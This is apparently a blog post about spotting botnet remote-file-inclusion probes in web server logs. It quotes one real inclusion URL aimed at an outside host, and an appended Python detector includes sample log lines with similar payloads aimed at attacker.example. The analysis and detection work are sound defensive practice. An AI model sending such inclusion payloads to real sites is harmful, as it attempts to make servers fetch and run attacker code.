I've got the impression that over the last couple of days, the amount of webspam is slightly down, while the number of script kiddie attacks is up sharply. So I had a closer look at our logs. I noticed a whole bunch of the usual inclusion attempts like
/index.php?kunden=http://amyru.h18.ru/images/cs.txt?
Sorry, guys - our index.php doesn't even look for a "kunden" parameter (and even if it did, it wouldn't fall for that old trick).
But what I found more interesting is the referrer that came with these attempts:
http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0
Altavista? Who uses that any more? Well, if you look closer, you'll notice that the actual query is for q=search, i.e. it's a query for the word "search"!? And if you try that in Altavista, you get a list of popular search engines - and a bunch of sponsored links. A script kiddie trying to earn something on the side?
Another thing this (poor) hack attempt shows is that it's pretty much useless these days to block IP addresses. At the time of this writing, I'm counting 3614 such requests in today's logfile, coming from 190 different IP addresses. And those are spread all over the world. Some I've checked at random were coming from Belgium, UK, Florida, The University of Virginia, ...
This is clearly a botnet in action here. The best you can do is to block some IP ranges but trying to block each and every IP address of such a botnet would be a task worthy of Sisyphus. Luckily, we've got other means. Bad Behavior, for example. And nothing beats a few carefully constructed .htaccess rules ...
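The kind of log tally described above (inclusion probes and the number of distinct addresses behind them) can be sketched as follows. This is an added example, not code from the original post; it assumes Apache "combined" log lines, and the function names, sample IPs and the host attacker.example are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"')
# A query value that is itself a remote URL is the mark of an inclusion probe.
REMOTE_VALUE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def rfi_params(target):
    """Names of query parameters whose decoded value starts with a remote URL."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes once; the extra unquote catches double encoding.
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_VALUE.match(unquote(value))]

def summarize(lines):
    """Tally inclusion probes, distinct source IPs, parameter names and referrers."""
    requests, ips, params, referers = 0, set(), Counter(), Counter()
    for line in lines:
        m = LOG_RE.match(line)
        flagged = rfi_params(m["target"]) if m else []
        if not flagged:
            continue
        requests += 1
        ips.add(m["ip"])
        params.update(flagged)
        referers[m["referer"]] += 1
    return {"requests": requests, "sources": len(ips),
            "params": params, "referers": referers}

# Constructed sample data: documentation-range IPs, placeholder host attacker.example.
REF = "http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0"

def _line(ip, target, referer="-"):
    return (f'{ip} - - [01/Jan/2007:10:00:00 +0000] "GET {target} HTTP/1.1" '
            f'404 0 "{referer}" "-"')

SAMPLE_LOG = [
    _line("192.0.2.10", "/index.php?kunden=http://attacker.example/cs.txt?", REF),
    _line("198.51.100.7", "/index.php?kunden=http%3A%2F%2Fattacker.example%2Fcs.txt%3F", REF),
    _line("203.0.113.5", "/index.php?id=1&page=FTP://attacker.example/cs.txt"),
    _line("192.0.2.10", "/index.php?page=2"),  # ordinary request, not flagged
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Because the check keys on the parameter value rather than on its name or the client address, it keeps matching when the probes rotate through new parameters and new source IPs.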